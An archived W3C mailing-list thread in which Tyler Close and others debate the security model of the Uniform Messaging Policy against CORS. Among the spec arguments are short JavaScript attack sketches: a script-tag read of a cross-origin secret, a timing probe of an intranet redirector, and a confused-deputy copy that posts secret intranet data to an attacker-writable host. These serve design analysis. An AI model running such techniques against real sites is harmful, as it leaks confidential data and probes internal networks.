 algorithmic specification to a non-normative appendix. Hopefully this
 organization will appeal to fans of either style. See:

 http://dev.w3.org/2006/waf/UMP/

 I'm hoping to move UMP forward to FPWD as soon as possible. Please let
 me know if there is anything I need to do to expedite this process.

 Thanks,
 --Tyler








-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [UMP] Server opt-in

2010-01-12 Thread Tyler Close
UMP supports confidentiality where client and server desire
confidentiality. I am mystified as to why you might think otherwise.
Concern over CSRF does not preclude concern over confidentiality; on
the contrary, it requires it.

--Tyler

On Tue, Jan 12, 2010 at 3:24 PM, Adam Barth w...@adambarth.com wrote:
 Before I respond to the below, I'd like to clarify one point.  Does
 UMP aim to provide confidentiality or are we concerned only with
 integrity?  It seems you consistently ignore confidentiality risks
 (e.g., your response below is entirely about CSRF).

 Adam


 On Tue, Jan 12, 2010 at 3:10 PM, Tyler Close tyler.cl...@gmail.com wrote:
 On Tue, Jan 12, 2010 at 2:57 PM, Adam Barth w...@adambarth.com wrote:
 On Tue, Jan 12, 2010 at 2:47 PM, Tyler Close tyler.cl...@gmail.com wrote:
 On Tue, Jan 12, 2010 at 2:44 PM, Adam Barth w...@adambarth.com wrote:
 Let me phrase my question another way.  Suppose the following situation:

 1) I'm a server operator and I want to provide a resource to other web 
 sites.
 2) I've been reading public-webapps and I'm concerned about the
 ambient authority in CORS.

 How can I share my resource with other web sites and enjoy the
 security benefits of UMP?

 Follow the advice given in the Security Considerations section of
 the UMP spec:

 http://dev.w3.org/2006/waf/UMP/#security

 As a server operator, why can't I follow that advice with CORS?

 You can.

 Nothing there seems specific to UMP.

 UMP is more restrictive on the server than is CORS. UMP doesn't make
 the client's ambient authority visible to the server.

 I don't understand how UMP is helping server operators deal with the
 risks of ambient authority.  When a server operator makes a resource
 available via UMP, they're also making it available to CORS with its
 attendant security model.

 UMP is helping server operators define APIs that enable their clients
 to defend themselves against CSRF-like vulnerabilities. A CSRF-like
 attack takes place on the client-side, not the server-side. The
 server's behavior needs to be restricted in a way that enables the
 client to communicate its wishes, while defending itself against CSRF.
 In particular, the client must be able to make a request without
 applying its credentials to the request, so the server must handle the
 request without demanding credentials be provided.

 --Tyler

 --
 Waterken News: Capability security on the Web
 http://waterken.sourceforge.net/recent.html





-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [UMP] Proxy-Authorization

2010-01-12 Thread Tyler Close
On Tue, Jan 12, 2010 at 3:04 PM, Adam Barth w...@adambarth.com wrote:
 On Tue, Jan 12, 2010 at 1:59 PM, Tyler Close tyler.cl...@gmail.com wrote:
 On Tue, Jan 12, 2010 at 12:29 PM, Adam Barth w...@adambarth.com wrote:
 On Tue, Jan 12, 2010 at 10:51 AM, Tyler Close tyler.cl...@gmail.com wrote:
 It's not feasible to remove all ambient authority. For example, the
 client has the authority to send requests from its IP address. So we
 draw a line between network connectivity and issued credentials. Proxy
 credentials provide network connectivity.

 Also, as a practical matter, disallowing Proxy-Authorization might
 inhibit use of UMP, since a resource author would be concerned about
 the loss of users who are required to use a proxy.

 RIght, this is the essential point: whether we should remove a piece
 of ambient authority is a risk management decision.  Instead of
 dogmatically stomping out all forms of ambient authority,

 Are you really accusing me of being dogmatic, or is this just more of
 your hyperbole?

 Quite to the contrary, you're *not* being dogmatic, which is my point.
  We ought not to be dogmatic about banning ambient authority because,
 as you say, that's impractical.  Instead we ought to consider the
 risks and rewards on a case-by-case basis.

 Your arguments are frequently misleading because their
 reasoning relies upon your use of hyperbole. In this case, by
 characterizing my argument as dogma, you avoid addressing the
 distinction I've drawn between network connectivity and credentials
 issued by a resource host. I think it's a principled and useful
 distinction and have explained why. Instead of logic, you respond with
 hyperbole.

 I'm not sure what you mean by hyperbole, but I agree with you that
 there's a distinction between network connectivity and credentials
 issued by a resource host.  Credentials issued by a resource host are
 both higher risk and higher benefit than network connectivity
 credentials.  How these risks and benefits balance varies depending on
 the deployment scenario.

Thank you for addressing this distinction.

Hyperbole is extreme and misleading exaggeration. In some cases, your
arguments take the form of presenting a choice between your position
and an obviously ridiculous position. For example, above you say we
must choose between a case-by-case approach and a dogmatic approach.
Such arguments preclude the existence of a third way that is not
ridiculous. In the above case, I am advocating such a third way. I
think we can take a principled approach that establishes the criteria
by which we decide what ambient authority is allowed: network
connectivity versus credentials issued by a resource host. The
advantage of a principled approach versus a case-by-case approach is
that it establishes the goal to be achieved and so creates a coherent
policy that others can implement to. In contrast, the Same Origin
Policy was clearly defined on a case-by-case basis and so has become
incoherent.

The form of argument you used in this case is known as a false
dichotomy. Please refrain from using this tactic. It is deceptive. Be
careful whenever you engage in exaggeration. It is always misleading,
and often rude.

 Even if we put out two APIs, one will become dominant.

 Right, the market will decide which protocol is most useful (i.e.,
 creates the most value).  That seems like a good thing.

That would abdicate our responsibility as a standards body. If that's
the best we can accomplish in this case, then so be it. It is not what
we should be aiming for. Sometimes, choosing a standard way creates
the most value. I believe this is one of those cases.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [UMP] Proxy-Authorization

2010-01-11 Thread Tyler Close
On Sun, Jan 10, 2010 at 2:25 PM, Adam Barth w...@adambarth.com wrote:
 I don't quite understand this part of that text:

 [[
 In this case, the request
 sent by the user-agent is not a uniform request; however, the request
 ultimately delivered to the resource host will be, since any
 Proxy-Authorization request header is removed by the proxy before
 forwarding the request to the resource host.
 ]]

 Concretely, suppose:

 1) The user has authenticated to a proxy P using the
 Proxy-Authenticate / Proxy-Authorization protocol.
 2) The user visits web site A which uses the UniformRequest API to
 generate a request R to web site B.
 3) Based on that text, it sounds like R is delivered to P with the
 Proxy-Authorization information intact.  Presumably the proxy will
 forward the request to B.
 4) B responds with Access-Control-Allow-Origin: *.

 Now, is B's response delivered to A?

Yes, assuming the user-agent is configured to use that proxy server.
Note that the request forwarded to B does *not* have a
Proxy-Authorization header.

 More abstractly, why aren't we worrying about P misbehaving based on
 the ambient authority in R (i.e., the Proxy-Authorization
 information)?  Why do the security considerations for the
 Proxy-Authorization header differ from the security considerations for
 the Authorization header?

The resource host decides whether or not to accept a request, what
side-effects are caused, and what information is put in the response.
We want to prevent ambient authority from having an effect on these
decisions by the resource host. The proxy is presumably semantically
transparent and so has no impact on these decisions by the resource
host. For https: resources, this transparency is cryptographically
enforced by the SSL protocol, which tunnels the connection through the
proxy.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [UMP] Proxy-Authorization

2010-01-10 Thread Tyler Close
On Sat, Jan 9, 2010 at 10:50 AM, Adam Barth w...@adambarth.com wrote:
 The UMP spec says:

 [[
 The user agent must not add any information obtained from: HTTP
 cookies, HTTP Auth headers, client certificates, or the referring
 resource, including its origin (other than the request parameters).
 ]]

 Does this include the Proxy-Authorization header?  If so, how can
 clients behind proxies that require authorization use web sites that
 depend on UMP?

Good catch. I've updated the text on sending a uniform request to
account for this proxy information. The new text is:


3.2 Sending a Uniform Request

The content of a uniform request is determined solely by the provided
uniform request parameters, the user-agent's response cache and the
required structure of an HTTP request. If a user-agent is configured
to send the request via a proxy, instead of directly to the host
specified by the request URL, this proxy configuration information can
be used to send the request to the proxy. In this case, the request
sent by the user-agent is not a uniform request; however, the request
ultimately delivered to the resource host will be, since any
Proxy-Authorization request header is removed by the proxy before
forwarding the request to the resource host. Other than this proxy
information, the user-agent must not augment the sent request with any
data that identifies the user or the origin of the request. In
particular, the user-agent must not add any information obtained from:
HTTP cookies, HTTP Auth headers, client certificates, or the referring
resource, including its origin (other than the request parameters).


See:
http://dev.w3.org/2006/waf/UMP/#request-sending
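
A rough sketch of that proxy behavior, purely illustrative and not part
of the spec (a hypothetical minimal Node.js-style forwarder; real
proxies also handle CONNECT tunnels, caching and other hop-by-hop
headers):

var http = require('http');
var url = require('url');

http.createServer(function (clientReq, clientRes) {
  // A forward proxy receives the full target URL in the request line.
  var target = url.parse(clientReq.url);

  // Copy the client's headers, minus the credential used to reach the
  // proxy itself, so the request the resource host sees stays uniform.
  var headers = {};
  Object.keys(clientReq.headers).forEach(function (name) {
    headers[name] = clientReq.headers[name];
  });
  delete headers['proxy-authorization'];

  var upstream = http.request({
    hostname: target.hostname,
    port: target.port || 80,
    path: target.path,
    method: clientReq.method,
    headers: headers
  }, function (upstreamRes) {
    clientRes.writeHead(upstreamRes.statusCode, upstreamRes.headers);
    upstreamRes.pipe(clientRes);
  });
  clientReq.pipe(upstream);
}).listen(3128);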

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [UMP] Feedback on UMP from a quick read

2010-01-10 Thread Tyler Close
On Sun, Jan 10, 2010 at 6:54 AM, Maciej Stachowiak m...@apple.com wrote:
 What I meant to say was that the weak confidentiality
 protection for ECMAScript should not be used as an excuse to weaken
 protection for other resources.

And I was never proposing to weaken existing protection for other
resources. My reasoning rested on two points:
1. I thought this redirect behavior was the CORS defined behavior.
2. Even if it's not, this WG is currently defining the security model
for newly allowed cross-domain requests. It's reasonable to say that
if you refer to a resource using a guessable URL and respond to a
uniform GET request with a response marked as accessible by any
origin, then there's no confidentiality. This rule has no impact on
the security of existing resources, since they don't yet have a Same
Origin Policy opt-out header. This rule has the advantage of covering
up the bizarre Same Origin Policy handling of ECMAScript data, thus
eliminating a dangerous security gotcha for developers. It's bad when
developers think they've implemented a design that provides
confidentiality, and that turns out not to be true. We should be
trying for a simple set of rules that yield easily predictable
results.

 This is a leaky and awkward hole but it does
 not justify ignoring more general confidentiality concerns in any context.

Again, I wasn't doing that. I was looking at one very specific context
that doesn't even exist yet, because we're currently defining it.

 Adam's analogy was that the widespread existence of XSS bugs is not a reason
 to remove all cross-domain protection either.

That would be an extremely foolish thing to propose. I don't think I
was being extremely foolish. The analogy is a poor one.

 While it's not a 100% on-point
 analogy, I got the point he was making and I recognize that it is similar to
 my own.

In that case, please consider the argument I present at the top of
this email. The proposal is different from what you've understood.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [UMP] Feedback on UMP from a quick read

2010-01-09 Thread Tyler Close
On Fri, Jan 8, 2010 at 4:56 PM, Adam Barth w...@adambarth.com wrote:
 On Fri, Jan 8, 2010 at 4:43 PM, Tyler Close tyler.cl...@gmail.com wrote:
 On Fri, Jan 8, 2010 at 3:56 PM, Adam Barth w...@adambarth.com wrote:
 [... Requiring uniform responses to redirects ...]
 It's a good thing to question, since this feature is a
 relaxation of the model, but it seems valuable and without risk. Can
 you think of a danger here?

 Here's an obscure risk:

 1) An enterprise (example.com) has a partially open redirector
 (go.corp.example.com) behind their firewall
 2) The redirector will only redirect to *.example.com
 3) There is a public site api.example.com that opts into UMP

 Now the attacker can probe go.corp.example.com by asking for redirects
 to api.example.com and reading back the response.

 I actually considered that case and convinced myself that the attacker
 *could* mount the attack using a form or iframe by timing the
 request. A working redirect will likely take longer to return than a
 broken redirect. Also, the attack can work without timing, but using a
 script tag, if the response can be parsed as ECMAScript.

 This is especially
 problematic if the redirector attaches interesting bits to the URLs it
 directs (like API keys).  This attack is not possible with the form
 element.

 Any unguessable bits in the redirect URL should not be revealed, since
 the attacker does not get access to the non-uniform redirect response,
 even if the final response is a uniform response.

 This design is also already dangerous, since using a form tag, the
 attacker can already freely exercise these API keys.

 You're assuming the API keys are for integrity.  What if they're for
 confidentiality?

If the response can be parsed as ECMAScript, an attacker can break
confidentiality by loading the document using a script tag. Also,
for any media-type, the attacker can mount a clickjacking attack
against this design. Since in general this design cannot be made safe,
I think it's better to not support it at all in the security model, by
allowing a uniform request to follow a non-uniform redirect. A
security model that works for some media-types but not others is just
too bizarre to explain to developers. This choice doesn't endanger
existing resources, since CORS also allows a cross-origin request to
follow a redirect that has not opted out of the Same Origin Policy.
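
A purely illustrative sketch of that first point (the host, path and
variable name are invented): if the protected response happens to parse
as ECMAScript, say it contains "var secretConfig = { apiKey: ... };",
then any page on the web can read it with ordinary script inclusion,
no XHR, CORS or UMP involved:

var s = document.createElement('script');
// Cross-origin script loads are not blocked by the Same Origin Policy.
s.src = 'http://resources.example.com/secret-config.js';
s.onload = function () {
  // The "confidential" values now live in the attacker's global scope.
  alert('leaked: ' + window.secretConfig.apiKey);
};
document.getElementsByTagName('head')[0].appendChild(s);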

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [UMP] Feedback on UMP from a quick read

2010-01-09 Thread Tyler Close
On Fri, Jan 8, 2010 at 3:36 PM, Tyler Close tyler.cl...@gmail.com wrote:
 On Fri, Jan 8, 2010 at 1:41 PM, Adam Barth w...@adambarth.com wrote:
 What happens with Set-Cookie headers included in uniform responses?
 It seems like we ought to ignore them based on the principle that UMP
 requests are made from a state store / context that is completely
 separate from the user agent's normal state store / context.

 That's a good point. I'll add text to that effect.

This new text is at:

http://dev.w3.org/2006/waf/UMP/#state-changes

I've also removed the recommendation to omit headers about the user-agent.

http://dev.w3.org/2006/waf/UMP/#request-sending

Thanks,
--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [UMP] Feedback on UMP from a quick read

2010-01-09 Thread Tyler Close
On Sat, Jan 9, 2010 at 10:20 AM, Adam Barth w...@adambarth.com wrote:
 On Sat, Jan 9, 2010 at 7:23 AM, Tyler Close tyler.cl...@gmail.com wrote:
 Since in general this design cannot be made safe,
 I think it's better to not support it at all in the security model, by
 allowing a uniform request to follow a non-uniform redirect. A
 security model that works for some media-types but not others is just
 too bizarre to explain to developers.

 That's the security model we have.  For example, it's safe to return
 untrusted HTML tags with certain media types but not with others.

Just because the Same Origin Policy is full of bizarre gotchas doesn't
mean the UMP must also be. Using the UMP with permission tokens
eliminates several of the gotchas. I'm taking every opportunity I can
to provide developers with a more reasonable security model. Surely a
security expert must applaud this effort.

 This choice doesn't endanger
 existing resources, since CORS also allows a cross-origin request to
 follow a redirect that has not opted out of the Same Origin Policy.

 I'm glad you consider CORS to be the epitome of a secure design.  :)

Does the smiley imply that you don't consider CORS to be a good
example of secure design?

For myself, I was merely citing CORS as the original definition for
the semantics of the Access-Control-Allow-Origin: * header.

 (As Maciej says, CORS doesn't appear to have this hole.)

Indeed, I misread the section on simple requests:

http://www.w3.org/TR/access-control/#simple-cross-origin-request0

I didn't realize the algorithm was checking the response headers in
several different places. I guess that's one of the dangers of an
algorithmic specification: you must have the whole thing in mind
before you can make any statements about what it does or does not do.

Given this correction, I'm reconsidering following of non-uniform
redirects. I still don't like that it makes it look like your example
design is safe, when in fact there are several non-confidentiality
problems with it, and using JSON for the final response also breaks
confidentiality.

 As Maciej says, just because the server can screw up its
 confidentiality doesn't mean we should prevent servers from doing the
 secure thing.  By this argument, we should remove the same-origin
 policy entirely because some sites might have XSS vulnerabilities.

Deciding to use a popular and standard media-type in its intended
setting is not at all comparable to filling your site with XSS
vulnerabilities. I did not read Maciej's email as suggesting
otherwise.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [UMP] Feedback on UMP from a quick read

2010-01-09 Thread Tyler Close
On Sat, Jan 9, 2010 at 2:23 PM, Adam Barth w...@adambarth.com wrote:
 On Sat, Jan 9, 2010 at 1:57 PM, Tyler Close tyler.cl...@gmail.com wrote:
 On Sat, Jan 9, 2010 at 10:20 AM, Adam Barth w...@adambarth.com wrote:
 That's the security model we have.  For example, it's safe to return
 untrusted HTML tags with certain media types but not with others.

 Just because the Same Origin Policy is full of bizarre gotchas doesn't
 mean the UMP must also be. Using the UMP with permission tokens
 eliminates several of the gotchas. I'm taking every opportunity I can
 to provide developers with a more reasonable security model. Surely a
 security expert must applaud this effort.

 You're making the security model *weaker* though.  Why not make it stronger?

 Your reaction to a small (i.e., partial) leak of information in one
 media type is to open the floodgates for leaking all information about
 all media types.  That doesn't make any sense.

Originally, you characterized your scenario as obscure. Now you say
it's opening the floodgates. I don't find your frequent outbursts of
hyperbole at all constructive. Others have pointed this out more
subtly, but I guess you didn't get the hint.

In any case, I thought following of non-uniform redirects was the
original semantics introduced by CORS and so decided to retain it.
Like I said in the last email, I am reconsidering that based on
Maciej's correction.

And just to be clear: in no reasonable way can either decision be said
to open the floodgates. I also don't see any reasonable way to
conclude that the UMP security model is weaker than CORS. Those are
some pretty outlandish claims to try to prove.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [UMP] Feedback on UMP from a quick read

2010-01-08 Thread Tyler Close
On Fri, Jan 8, 2010 at 1:41 PM, Adam Barth w...@adambarth.com wrote:
 [[
 In particular, the user agent should not add the HTTP headers:
 User-Agent, Accept, Accept-Language, Accept-Encoding, or
 Accept-Charset
 ]]

 This seems a bit overly constrictive.  Maybe we should send Accept: */*, 
 etc?

 More generally, I suspect the requirements in Section 3.2 violate
 various HTTP RFCs.  Maybe we should use the term willful violation
 somewhere?

Which RFCs are you referring to? AFAIK, Section 3.2 doesn't violate
any MUST requirement in any relevant RFC.

There are two uses for this requirement:
1. On browsers that don't yet support any cross-domain API, it would
be nice to emulate support by routing the request through the
requestor's Origin server. To help ensure the response is the same
whether it was sent directly from the user agent or via the Origin
server, we omit any information about the sending software.
2. Omitting these headers can significantly reduce message size and so
improve performance.

 [[
 If the response to a uniform request is an HTTP redirect, it is
 handled as specified by [HTTP], whether or not the redirect is itself
 a uniform response. If the redirect is not a uniform response, the
 user-agent must still prevent the requesting content from accessing
 the content of the redirect itself, though a response to a redirected
 request might be accessible if it is a uniform response. If the
 response to a uniform request is an HTTP redirect, any redirected
 request must also be a uniform request.
 ]]

 This seems looser than needed.  It would be better if the redirect had
 to be a uniform response also.  There's a note in the spec The HTML
 form element can also follow any redirect, without restriction by
 the Same Origin Policy, but the form element also sends Accept and
 User-Agent headers.  What's the reason for excluding the headers but
 not requiring redirects to be uniform responses?

Somewhere in the list archives, I believe there's a message that
pointed out a need to remain compatible with existing HTTP redirection
software that cannot be (or won't be) updated to include the new
header. For example, if the page receives a URL from a URL shortening
service, it would be nice to be able to complete the request even if
the URL shortening service doesn't return uniform response redirects.
The form argument makes it clear that following a non-uniform
redirect doesn't introduce a security vulnerability. AFAICT, this
feature also doesn't lead the resource author into any poor design
choices. It's a good thing to question, since this feature is a
relaxation of the model, but it seems valuable and without risk. Can
you think of a danger here?

 What happens with Set-Cookie headers included in uniform responses?
 It seems like we ought to ignore them based on the principle that UMP
 requests are made from a state store / context that is completely
 separate from the user agent's normal state store / context.

That's a good point. I'll add text to that effect.

Thanks,
--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [UMP] Feedback on UMP from a quick read

2010-01-08 Thread Tyler Close
On Fri, Jan 8, 2010 at 2:53 PM, Adam Barth w...@adambarth.com wrote:
 One more question: the draft doesn't seem to provide any way to
 generate a uniform request.  Are we planning to have another
 specification for an API for generating these requests?

Similar to CORS, UMP is just the security model; separate API specs
define the API for making requests under that model. So, as XHR2 is to
CORS, a yet-to-come UniformRequest is to UMP.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [UMP] Feedback on UMP from a quick read

2010-01-08 Thread Tyler Close
On Fri, Jan 8, 2010 at 3:56 PM, Adam Barth w...@adambarth.com wrote:
 On Fri, Jan 8, 2010 at 3:36 PM, Tyler Close tyler.cl...@gmail.com wrote:
 There are two uses for this requirement:
 1. On browsers that don't yet support any cross-domain API, it would
 be nice to emulate support by routing the request through the
 requestor's Origin server. To help ensure the response is the same
 whether it was sent directly from the user agent or via the Origin
 server, we omit any information about the sending software.

 If this is an important consideration, then the server software can
 just copy the relevant headers.  I'm not sure there's a good security
 case to be made here for deviating from standard operating procedure.
 It seems quite sensible to send an Accept header of */* instead of
 omitting the header.

I'm not making a security argument here, just an engineering one. It
seems simpler and more efficient this way.

 2. Omitting these headers can significantly reduce message size and so
 improve performance.

 This seems like premature optimization to me.  Do you have benchmarks
 that show this has any impact on page load time (or any other metric
 you think is interesting)?

Reading Steve Souders' stuff has impressed upon me the cost of message
size overhead. If you just open up a Firebug console, it's clear that
these headers are eating up a significant fraction of the MTU and so
splitting messages that should've gone over the wire in a single
packet.

All that said, perhaps it makes more sense to move this recommendation
to individual UMP API specs, such as UniformRequest, rather than deal
with it in the UMP spec, leaving it as purely about the security
model. At the very least, that delays the controversy. I'll remove the
text from the UMP spec.

 [... Requiring uniform responses to redirects ...]
 It's a good thing to question, since this feature is a
 relaxation of the model, but it seems valuable and without risk. Can
 you think of a danger here?

 Here's an obscure risk:

 1) An enterprise (example.com) has a partially open redirector
 (go.corp.example.com) behind their firewall
 2) The redirector will only redirect to *.example.com
 3) There is a public site api.example.com that opts into UMP

 Now the attacker can probe go.corp.example.com by asking for redirects
 to api.example.com and reading back the response.

I actually considered that case and convinced myself that the attacker
*could* mount the attack using a form or iframe by timing the
request. A working redirect will likely take longer to return than a
broken redirect. Also, the attack can work without timing, but using a
script tag, if the response can be parsed as ECMAScript.
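
For concreteness, a sketch of the timing variant (the redirector URL
and its query parameter are invented for this example; the probe never
reads the response, it only measures how long the cross-origin load
takes to settle):

function probe(redirectorUrl, done) {
  var start = new Date().getTime();
  var img = new Image();
  img.onload = img.onerror = function () {
    done(new Date().getTime() - start);
  };
  img.src = redirectorUrl;
}

probe('http://go.corp.example.com/?to=http://api.example.com/guess',
      function (ms) {
        // A redirect that resolves tends to take noticeably longer than
        // one the redirector rejects, leaking one bit per guess.
        alert('round trip: ' + ms + 'ms');
      });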

 This is especially
 problematic if the redirector attaches interesting bits to the URLs it
 directs (like API keys).  This attack is not possible with the form
 element.

Any unguessable bits in the redirect URL should not be revealed, since
the attacker does not get access to the non-uniform redirect response,
even if the final response is a uniform response.

This design is also already dangerous, since using a form tag, the
attacker can already freely exercise these API keys.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



[UMP] A declarative version of Uniform Messaging Policy

2010-01-07 Thread Tyler Close
I've updated the UMP spec to use a declarative style and moved the
algorithmic specification to a non-normative appendix. Hopefully this
organization will appeal to fans of either style. See:

http://dev.w3.org/2006/waf/UMP/

I'm hoping to move UMP forward to FPWD as soon as possible. Please let
me know if there is anything I need to do to expedite this process.

Thanks,
--Tyler

On Tue, Jan 5, 2010 at 2:41 PM, Tyler Close tyler.cl...@gmail.com wrote:
 I've uploaded an updated version of Uniform Messaging Policy, Level
 One to the W3C web site. See:

 http://dev.w3.org/2006/waf/UMP/

 This version reflects feedback received to date and follows the
 document conventions of a FPWD.

 I look forward to any additional feedback.

 Thanks,
 --Tyler

 --
 Waterken News: Capability security on the Web
 http://waterken.sourceforge.net/recent.html




-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [UMP] updated editor's draft of Uniform Messaging Policy on W3C site

2010-01-06 Thread Tyler Close
On Wed, Jan 6, 2010 at 1:58 AM, Anne van Kesteren ann...@opera.com wrote:
 On Tue, 05 Jan 2010 23:41:07 +0100, Tyler Close tyler.cl...@gmail.com
 wrote:

 I've uploaded an updated version of Uniform Messaging Policy, Level
 One to the W3C web site. See:

 http://dev.w3.org/2006/waf/UMP/

 This version reflects feedback received to date and follows the
 document conventions of a FPWD.

 I look forward to any additional feedback.

 It's still not clear to me how the use cases in

  http://dev.w3.org/2006/waf/access-control/#use-cases

 are done using UMP. My apologies if I missed a reply to my email asking for
 that.

Hi Anne, sorry for the delay in responding to your email.

Which of these use cases are you having difficulty with? There have
been several email threads about these use cases and corresponding
solutions using UMP. Are you saying you didn't understand any of them,
or one in particular, or is there one that was not covered?

Thanks,
--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



[UMP] updated editor's draft of Uniform Messaging Policy on W3C site

2010-01-05 Thread Tyler Close
I've uploaded an updated version of Uniform Messaging Policy, Level
One to the W3C web site. See:

http://dev.w3.org/2006/waf/UMP/

This version reflects feedback received to date and follows the
document conventions of a FPWD.

I look forward to any additional feedback.

Thanks,
--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: Scientific Literature on Capabilities (was Re: CORS versus Uniform Messaging?)

2009-12-21 Thread Tyler Close
On Thu, Dec 17, 2009 at 5:49 PM, Ian Hickson i...@hixie.ch wrote:
 On Thu, 17 Dec 2009, Tyler Close wrote:

 Starting from the X-FRAME-OPTIONS proposal, say the response header
 also applies to all embedding that the page renderer does. So it also
 covers img, video, etc. In addition to the current values, the
 header can also list hostname patterns that may embed the content. So,
 in your case:

 X-FRAME-OPTIONS: *.example.com
 Access-Control-Allow-Origin: *

 Which means anyone can access this content, but sites outside
 *.example.com should host their own copy, rather than framing or
 otherwise directly embedding my copy.

 Why is this better than:

   Access-Control-Allow-Origin: *.example.com

X-FRAME-OPTIONS is a rendering instruction and
Access-Control-Allow-Origin is part of an access-control mechanism.
Combining the two in the way you propose creates an access-control
mechanism that is inherently vulnerable to CSRF-like attacks, because
it determines read access to bits based on the identity of the
requestor.

Using your example, assume an XML resource sitting on an intranet
server at resources.example.com. The author of this resource is trying
to restrict access to the XML data to only other intranet resources
hosted at *.example.com. The author believes this can be accomplished
by simply setting the Access-Control-Allow-Origin header as you've
shown above, but that's not strictly true. Every page hosted on
*.example.com is now a potential target for a CSRF-like attack that
reveals the secret data. For example, consider a page at
victim.example.com that uses a third party storage service. To copy
data, the page does a GET on the location of the existing data,
followed by a POST to another location with the data to be copied. If
the storage service says the location of the existing data is the URL
for the secret XML data (http://resources.example.com/...), then the
victim page suffers a CSRF-like attack that exposes the secret data.
The victim page may know nothing of the existence or purpose of the
secret XML resource.
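
A sketch of that copy operation, to make the deputy concrete (all URLs
are invented, and the XMLHttpRequest calls merely stand in for whatever
API the storage service's page actually uses):

function copy(sourceUrl, destUrl) {
  var get = new XMLHttpRequest();
  get.open('GET', sourceUrl);    // sourceUrl is chosen by the storage service
  get.withCredentials = true;    // the victim's ambient authority rides along
  get.onload = function () {
    var post = new XMLHttpRequest();
    post.open('POST', destUrl);  // destUrl may be readable by the attacker
    post.send(get.responseText); // the secret leaves the intranet
  };
  get.send();
}

// If the service names the secret resource as the thing to copy, the
// victim page becomes the deputy that exfiltrates it:
copy('http://resources.example.com/secret.xml',
     'http://storage.example.net/attacker-writable-location');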

To avoid this pitfall, we instead design the access-control mechanism
to not create these traps. With the bogus technique removed, the
author of a protected resource can now choose amongst techniques that
actually work.

To address your bandwidth stealing concerns, and other similar issues,
we define X-FRAME-OPTIONS so that a resource author can inform the
browser's renderer of these preferences. So your XBL resource can
declare that it was only expecting to be applied to another resource
from *.example.com. The browser can detect this misconfiguration and
raise an error notification.

By separating the two mechanisms, we make the access-control model
clear and correct, while still providing the rendering control you
desired.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: Scientific Literature on Capabilities (was Re: CORS versus Uniform Messaging?)

2009-12-21 Thread Tyler Close
On Mon, Dec 21, 2009 at 2:16 PM, Ian Hickson i...@hixie.ch wrote:
 On Mon, 21 Dec 2009, Tyler Close wrote:
 On Thu, Dec 17, 2009 at 5:49 PM, Ian Hickson i...@hixie.ch wrote:
  On Thu, 17 Dec 2009, Tyler Close wrote:
 
  Starting from the X-FRAME-OPTIONS proposal, say the response header
  also applies to all embedding that the page renderer does. So it also
  covers img, video, etc. In addition to the current values, the
  header can also list hostname patterns that may embed the content. So,
  in your case:
 
  X-FRAME-OPTIONS: *.example.com
  Access-Control-Allow-Origin: *
 
  Which means anyone can access this content, but sites outside
  *.example.com should host their own copy, rather than framing or
  otherwise directly embedding my copy.
 
  Why is this better than:
 
    Access-Control-Allow-Origin: *.example.com

 X-FRAME-OPTIONS is a rendering instruction and
 Access-Control-Allow-Origin is part of an access-control mechanism.
 Combining the two in the way you propose creates an access-control
 mechanism that is inherently vulnerable to CSRF-like attacks, because
 it determines read access to bits based on the identity of the
 requestor.

 Using your example, assume an XML resource sitting on an intranet
 server at resources.example.com. The author of this resource is trying
 to restrict access to the XML data to only other intranet resources
 hosted at *.example.com. The author believes this can be accomplished
 by simply setting the Access-Control-Allow-Origin header as you've
 shown above, but that's not strictly true. Every page hosted on
 *.example.com is now a potential target for a CSRF-like attack that
 reveals the secret data. For example, consider a page at
 victim.example.com that uses a third party storage service. To copy
 data, the page does a GET on the location of the existing data,
 followed by a POST to another location with the data to be copied. If
 the storage service says the location of the existing data is the URL
 for the secret XML data (http://resources.example.com/...), then the
 victim page suffers a CSRF-like attack that exposes the secret data.
 The victim page may know nothing of the existence or purpose of the
 secret XML resource.

 To avoid this pitfall, we instead design the access-control mechanism
 to not create these traps. With the bogus technique removed, the
 author of a protected resource can now choose amongst techniques that
 actually work.

 To address your bandwidth stealing concerns, and other similar issues,
 we define X-FRAME-OPTIONS so that a resource author can inform the
 browser's renderer of these preferences. So your XBL resource can
 declare that it was only expecting to be applied to another resource
 from *.example.com. The browser can detect this misconfiguration and
 raise an error notification.

 By separating the two mechanisms, we make the access-control model
 clear and correct, while still providing the rendering control you
 desired.

 I don't understand the difference between "opaque string origin
 opaque string" and "opaque string origin".

 With XBL in particular, what we need is something that decides whether a
 page can access the DOM of the XBL file or not, on a per-origin basis.
 Whether the magic string is:

   X-FRAME-OPTIONS: *.example.com
   Access-Control-Allow-Origin: *

 ...or:

   X-FRAME-OPTIONS: *.example.com

 ...or:

   Access-Control-Allow-Origin: *.example.com

 ...or:

   X: *.example.com

 ...or some other sequence of bytes doesn't seem to make any difference to
 any actual concrete security. There's only one mechanism here. Either
 access is granted to that origin, or it isn't.

No, there is a difference in access-control between the two designs.

In the two header design:
1) An XHR GET of the XBL file data by example.org *is* allowed.
2) An xbl import of the XBL data by example.org triggers a rendering error.

In the one header design:
1) An XHR GET of the XBL file data by example.org is *not* allowed.
2) An xbl import of the XBL data by example.org triggers a rendering error.

